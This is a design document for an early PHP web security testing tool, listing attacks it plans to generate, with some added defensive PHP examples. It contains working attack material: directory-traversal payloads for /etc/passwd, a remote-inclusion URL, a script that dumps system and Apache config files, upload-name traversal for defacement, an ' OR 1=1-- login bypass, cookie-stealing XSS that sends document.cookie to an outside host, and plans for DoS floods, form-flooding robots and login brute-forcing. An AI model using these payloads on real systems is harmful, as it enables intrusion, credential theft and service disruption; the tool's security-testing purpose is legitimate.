WST Project
Name: Web Security Tester
Version: 1.0b
License: GNU/GPL - http://www.gnu.org/copyleft/gpl.html
Status: Under development
Authors: Simone Cosci <hide@address.com>, Mauro Casciari <hide@address.com>
Package-Type: Library and Application
Language: PHP4
Extensions: mime_magic, domxml
Description: Test the security level of web applications
Objectives: Find possible system vulnerabilities using the HTTP protocol
Libraries:
HttpRequest.cls.php
HttpResponse.cls.php
HtmlParser.cls.php
HtmlFormParser.cls.php
CssParser.cls.php
Utility:
FileSystem.lib.php
String.lib.php
Interfaces: web/ gtk/ cmd/
Web: http://wst/web/index.php
Gtk: $ php gtk/wst.php
Cmd: $ php cmd/wst.php -p=80 -h=www.host.com -s=192.168.1.100 -m=GET -t=/index.php
TODO:
*1) Configure the first HttpRequest
*2) Parse the HttpResponse to catch headers and HTML
~3) Parse HTML to find relevant elements such as forms, images, links, scripts
4) Test each element by generating attack scripts like DoS, Floods, BruteForcers, Traversals, SQL injectors, Cross Site Scripts
5) Pluggable and configurable external exploits
Vulnerable images or files can be detected in strings like these:
action=["'][path]["']
href=["'][path]["']
src=["'][path]["']
background=["'][path]["']
url(["'][path]["'])
@import ["'][path]["']
window.open(["'][path]["']...)
location=["'][path]["']...
every ["']http://[piece_1]/[piece_n]["']
every ["']/[piece_1]/[piece_n]["']
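The path extraction that step 3 of the TODO describes, as an added example that is not part of the WST project: one regex per pattern family listed above, with each hit classified as absolute URL, absolute path or relative path. It assumes PHP 7+ and uses a constructed sample page.

```php
<?php
// Added example, not part of the WST project: extract the paths referenced by a
// page using the attribute/function patterns listed above, then classify each one.
// Assumes PHP 7+; the sample page below is constructed for the demo.

function wst_extract_refs(string $body): array {
    // One regex per pattern family from the list: attr=path, url(path), @import, window.open(...), location=...
    $patterns = [
        '/\b(?:action|href|src|background)\s*=\s*["\']([^"\']+)["\']/i',
        '/\burl\(\s*["\']?([^"\')]+)["\']?\s*\)/i',
        '/@import\s+["\']([^"\']+)["\']/i',
        '/window\.open\(\s*["\']([^"\']+)["\']/i',
        '/\blocation\s*=\s*["\']([^"\']+)["\']/i',
    ];
    $seen = [];
    foreach ($patterns as $re) {
        if (preg_match_all($re, $body, $m)) {
            foreach ($m[1] as $path) {
                $seen[$path] = true; // de-duplicate across patterns
            }
        }
    }
    $refs = [];
    foreach (array_keys($seen) as $path) {
        if (preg_match('#^https?://#i', $path)) {
            $kind = 'absolute-url';   // the ["']http://[piece_1]/[piece_n]["'] case
        } elseif ($path[0] === '/') {
            $kind = 'absolute-path';  // the ["']/[piece_1]/[piece_n]["'] case
        } else {
            $kind = 'relative';
        }
        $query = parse_url($path, PHP_URL_QUERY);
        // Paths carrying GET parameters are the ones the later sections look at more closely.
        $refs[] = ['path' => $path, 'kind' => $kind, 'has_params' => !empty($query)];
    }
    return $refs;
}

// Constructed sample page exercising every pattern family.
$sample = <<<'HTML'
<link rel="stylesheet" href="/css/site.css">
<style>body { background: url("/img/bg.png") } @import "print.css";</style>
<form action="script.php?param1=page1&param2=x"><input type="submit"></form>
<img src='http://static.example/logo.jpg' background="tile.gif">
<script>window.open("http://example.org/popup.html"); location="/home";</script>
HTML;

foreach (wst_extract_refs($sample) as $ref) {
    printf("%-14s params=%-3s %s\n", $ref['kind'], $ref['has_params'] ? 'yes' : 'no', $ref['path']);
}
```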
We can try to detect:
DirectoryListing:
Each path (relative or absolute) has to be processed:
each folder composing the path has to be scanned for directory listing, default HTML, robots.txt etc.
and the process restarted using target=this.folder
Linked:
Processing HTML we can find many different and interesting pieces of information.
For images or files over 100Kb we can generate scripts for DoS attacks,
like a continuous GET filename.jpg?t="+time()+rand(0,1000) (Google doesn't permit it! -> 404)
For paths that include GET parameters we can suppose many things:
Ex. if the server is Apache on a Linux machine, all vhosts are usually put in
/var/www/
/var/www/htdocs/
/var/www/html/
/home/hosts/
...
Supposing that one of the parameters sent by href or GET like script.ext?param1=value1&param2=value2
is used to read something on the filesystem in an instruction like readfile(param1) or include(param1),
we can try to build different paths to get important information, e.g.
script.ext?param1=../../../etc/passwd&param2=../../../etc/passwd
script.ext?param1=../../../../etc/passwd&param2=../../../../etc/passwd
script.ext?param1=../../../../../etc/passwd&param2=../../../../../etc/passwd
or to include our remote script.inc with a GET like this: script.ext?param1=http://me.supereva.it/script.inc
<?php
// Candidate files to look for, relative to the directory being walked up from.
$files = array(
    'etc/passwd',
    'etc/httpd/httpd.conf',
    'etc/apache/apache.conf',
    // further candidate files go here
);
foreach ($files as $file) {
    // Prepend 1..9 levels of "../" and dump whatever is reachable.
    for ($i = 1; $i < 10; $i++) {
        $path = str_repeat('../', $i) . $file;
        if (file_exists($path)) {
            echo "-------------------------------------------------\r\n";
            $fp = fopen($path, 'rb');
            $c = fread($fp, filesize($path));
            fclose($fp);
            echo $c;
        }
    }
}
exit;
?>
Forms:
Forms are very important.
Especially forms with enctype="multipart/form-data" that accept file uploads.
We can try to upload files like script.inc spoofing the content-type,
or renaming the file like ../../../../../etc/passwd or ../../../index.php
to see if moving the file into a folder like /user_images/foo/$image_name will produce /user_images/foo/../../../index.php,
overwriting the actual index.php for defacing or grabbing info.
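The hardened counterpart of both the include(param1)/readfile(param1) case above and the upload-move case in this paragraph, as an added example that is not part of the WST project: a user-supplied name is accepted only if it resolves to a regular file under a fixed base directory, and an uploaded file never keeps its client-side name. It assumes PHP 7.1+ and constructs its own base directory for the demo.

```php
<?php
// Added example, not part of the WST project: the defensive counterpart of the
// include(param1)/readfile(param1) and upload-move scenarios. A user-supplied name
// is accepted only if it resolves to a regular file inside a fixed base directory,
// so ../../../etc/passwd and http://... never reach include(), readfile() or
// move_uploaded_file(). Assumes PHP 7.1+; base directory and names are constructed.

function wst_safe_path(string $base, string $userPath): ?string {
    // Reject URL schemes outright (remote inclusion) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $userPath) || strpos($userPath, "\0") !== false) {
        return null;
    }
    $baseReal = realpath($base);
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($baseReal === false || $candidate === false) {
        return null; // base missing or target does not exist
    }
    // Containment check: the resolved path must stay under the base directory.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0 || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

function wst_safe_upload_name(string $clientName, array $allowedExt): ?string {
    // Keep only the last path component, then whitelist the extension.
    $name = basename(str_replace('\\', '/', $clientName));
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($name === '' || $name[0] === '.' || !in_array($ext, $allowedExt, true)) {
        return null;
    }
    // Discard the client name entirely; a random name cannot collide with index.php.
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Demo with a constructed base directory containing one page.
$base = sys_get_temp_dir() . '/wst_demo_' . getmypid();
mkdir($base . '/pages', 0700, true);
file_put_contents($base . '/pages/about.html', '<h1>About</h1>');

var_dump(wst_safe_path($base, 'pages/about.html'));                 // legitimate relative path
var_dump(wst_safe_path($base, '../../../../etc/passwd'));           // traversal attempt
var_dump(wst_safe_path($base, 'http://me.supereva.it/script.inc')); // remote inclusion attempt
var_dump(wst_safe_upload_name('../../../index.php', ['jpg', 'png', 'gif'])); // traversal in upload name
var_dump(wst_safe_upload_name('photo.JPG', ['jpg', 'png', 'gif']));          // accepted and renamed
```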
In forms like registrations or subscriptions that don't have a random-image system against robots,
we can generate a robot that sends random info to the form-action script until the database fills up the partition space.
The same is valid for contact forms that send emails to a mail server that has limited space too.
Login forms can be brute-forced with scripts that have dictionaries
and that can send the requested vars, with the correct method, from a spoofed referer ;-)
analyzing the answer until a specific string is no longer found (Ex. "Invalid user or password")
SQL injections are also great tests for vulnerability, and in login forms we are sure that the values we POST will be inserted in an SQL query.
Username=""; Password="' OR 1=1--"
In forms like comments that will probably be read by an administrator we can suppose that they will be displayed in a web page.
So, if the administrator views the comments rendered on the HTML page, we can think of sending a small image like this:
$comment = "Hello! Nice site.<script>document.write('<img src=\"http://myhost/getcoockie.php?cookie='+document.cookie+'\" width=1 height=1 border=0>')</script>";
or, if the comments are read inside a textarea or whatever HTML control:
$comment = "Hello! Nice site.</whatever><script>document.write('<img src=\"http://myhost/getcoockie.php?cookie='+document.cookie+'\" width=1 height=1 border=0>')</script>";
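The login form and the comment form from this section written so that the two payloads above are harmless, as an added example that is not part of the WST project: a bound parameter for the login query and output escaping for the comment. It assumes PHP 7+ with pdo_sqlite; the users table and the comment are constructed.

```php
<?php
// Added example, not part of the WST project: the login form and comment form from
// the section above, written so that the payloads shown there are harmless.
// Assumes PHP 7+ with pdo_sqlite; the users table and the comment are constructed.

function wst_check_login(PDO $db, string $user, string $pass): bool {
    // Vulnerable shape for contrast: "... WHERE username='$user' AND password='$pass'".
    // With a bound parameter the input is never spliced into the SQL text, so a
    // password of "' OR 1=1--" is just a string that fails password_verify().
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    return $hash !== false && password_verify($pass, $hash);
}

function wst_render_comment(string $comment): string {
    // Escape on output: "</whatever>" and "<script>" become inert text, whether the
    // comment is rendered inline or inside a textarea.
    return '<p>' . htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users VALUES (:u, :h)');
$ins->execute([':u' => 'admin', ':h' => password_hash('correct horse', PASSWORD_DEFAULT)]);

var_dump(wst_check_login($db, 'admin', 'correct horse'));   // the real credentials
var_dump(wst_check_login($db, '', "' OR 1=1--"));          // the injection attempt from above

$comment = "Hello! Nice site.</whatever><script>document.write('<img src=\"http://myhost/x\">')</script>";
echo wst_render_comment($comment), "\n";
```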
Useful for:
System administrators: Test the vulnerability to DoS, brute forcing etc.
Software developers: Check how the application reacts when sending an HTTP request, reading the response, modifying it, re-sending the HTTP request
... tampering with data in some way. Check the vulnerability to SQL injections, XSS, remote code execution etc.